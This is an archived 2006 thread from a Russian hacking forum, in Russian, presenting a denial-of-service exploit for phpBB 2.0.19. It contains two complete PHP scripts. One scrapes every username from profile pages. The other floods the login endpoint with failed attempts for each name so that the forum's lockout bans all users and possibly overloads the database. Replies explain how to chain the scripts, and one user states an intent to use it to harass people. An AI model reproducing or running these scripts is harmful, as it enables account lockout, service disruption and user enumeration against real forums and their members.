Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Уязвимость в phpbb 2.0.19 возможно даже более ранние версии (https://forum.antichat.xyz/showthread.php?t=14290)

k1b0rg 11.02.2006 22:32

Уязвимость в phpbb 2.0.19 возможно даже более ранние версии
 
Уязвимость позволяет забанить всех пользователей на форуме, что в свою очередь может вызвать сбой в работе базы данных.
Суть ошибки состоит в том, что при авторизации пользователя можно вести неверные данные x-раз, что приведет к бану соответствующего пользователя форума на определенное время указное в админке форума и пользователь при авторизации увидит следующее - (Максимальное количество попыток (X) войти на форум было исчерпано. Вы не сможете войти на форум в последующие Y минут.) или произойдет ошибка в базе данных (phpBB : Critical Error Could not connect to the database).

Эксплоит (написан на php)

Собирает в файл Ники всех пользователей форума.
---------------
Автор: k1b0rg
---------------
Код:

<?
$host="Сайт";
$papka="Папка с форумом";
$port=80;
$number_users=2050;
$start=1;
set_time_limit(0);
$file="user.txt";
$file=fopen($file,*w*);
for($i=$start;$i<=$number_users;$i++)
{$request="GET http://$host/$papka/profile.php?mode=viewprofile&u=$i HTTP/1.0\r\n";
$request.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, *\/*\r\n";
$request.="Accept-Language: ru\r\n";
$request.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
$request.="Host: $host\r\n";
$request.="Proxy-Connection: Keep-Alive\r\n\r\n";
$sock=fsockopen("$host",$port,$errno,$errstr);
fputs($sock,$request);
while(!feof($sock))
{$str=fgets($sock);
if(preg_match("/nowrap=\"nowrap\">Профиль пользователя (.*)<\/th>/i",$str,$return))
{if(trim($return[1])!=**)
{fputs($file,"$return[1]\n");
}}}}
fclose($file);
fclose($sock);
?>

Скрипт для сборки всех зарегенных юзеров универсальный т.е. подходит под любой форум. Но только если:
1. Если не зарегеным пользователям можно смотреть профайл других (иначе придеться еще посылать строку с вашими куками)
2. Правильно настроен preg_match("/nowrap=\"nowrap\">Профиль пользователя (.*)<\/th>/i",$str,$return))
в некоторых форумах придеться немного изменить, если допустим имя юзверя находиться в титле <title>Юзер - Lamer</title>
то переписываем preg_match как
preg_match("/<title>Юзер - (.*)<\/title>/i",$str,$return))
Сам сплоит
---------------
Автор: ASSCOL
---------------
Код:

<?
set_time_limit(0);
$host="Сайт";
$papka="Папка с форумом";
$file=fopen("user.txt",*r*);
while(!feof($file))
{
$str=fgets($file);
$str=trim($str);
for($i=0; $i<=5; $i++)
{
$request="POST http://$host/$papka/login.php?sid=f1bed4ab383a8521a612d6896e0ee21e HTTP/1.0\r\n";
$request.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, *\/*\r\n";
$request.="Referer: http://$host/$papka/login.php\r\n";
$request.="Accept-Language: ru\r\n";
$request.="Content-Type: application/x-www-form-urlencoded\r\n";
$request.="Proxy-Connection: Keep-Alive\r\n";
$request.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2)\r\n";
$request.="Host: $host\r\n";
$request.="Content-Length: 73\r\n";
$request.="Pragma: no-cache\r\n";
$request.="Cookie: b=b; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=f1bed4ab383a8521a612d6896e0ee21e; hotlog=1\r\n";
$request.="\r\n";
$request.="username=$str&password=5555&redirect=&login=%C2%F5%EE%E4\r\n\r\n";
$fp=fsockopen("$host",80,$errstr,$errno);
fputs($fp,$request);
fclose($fp);
}
}
?>

--------------------------------
Нашел уязвимость ASSCOL.
--------------------------------
Статья взята с сайта http://comp-info.ru

max_pain89 11.02.2006 22:40

как могут быть уязвимы более ранние версии, если эта функция включена тока в 19-ую сборку

gazta 12.02.2006 15:16

А с никами что потом делать?

k1b0rg 12.02.2006 15:17

берешь первый скрипт, он вытягивает все ники с форума ,а потом их записываешь в файл user.txt и запускаешь второй сплойт

FHT 12.02.2006 15:51

Вешь прикольная, но смысла с нее помоему маловато =)
Разве что насолить плотно кому-то =)
Ох счас поиздеваюсь =)
Спасибо k1b0rg =)

max_pain89 12.02.2006 17:34

тот же DoS только изощренная форма

Zadoxlik 12.02.2006 18:16

Байан, никакой не АССОЛ это нашел) Об этом писали еще как тока эта фича вообще появилась

k1b0rg 12.02.2006 18:38

2Zadoxlik
дай сцылку где писали

Zadoxlik 12.02.2006 19:55

Цитата:

Сообщение от k1b0rg
2Zadoxlik
дай сцылку где писали

Я щас не помню уже. по-мойму на myphpbb.com.ru или где-то в обсуждении короче этой версии. Речь зашла об этой блокировке и кто-то предположил что так можно банить, что собственно само собой разумеется.
Вообще непонятно, о чем девелоперы думают... Там по-мойму был какой-то патч, убирающий эту фигню

k1b0rg 12.02.2006 20:04

Ну а если человек ее сам нушол этот глюк, тогда что?
авторство сохранено, и удали плиз наши мессаги, чтобы во флуд не переросла тема


Время: 00:35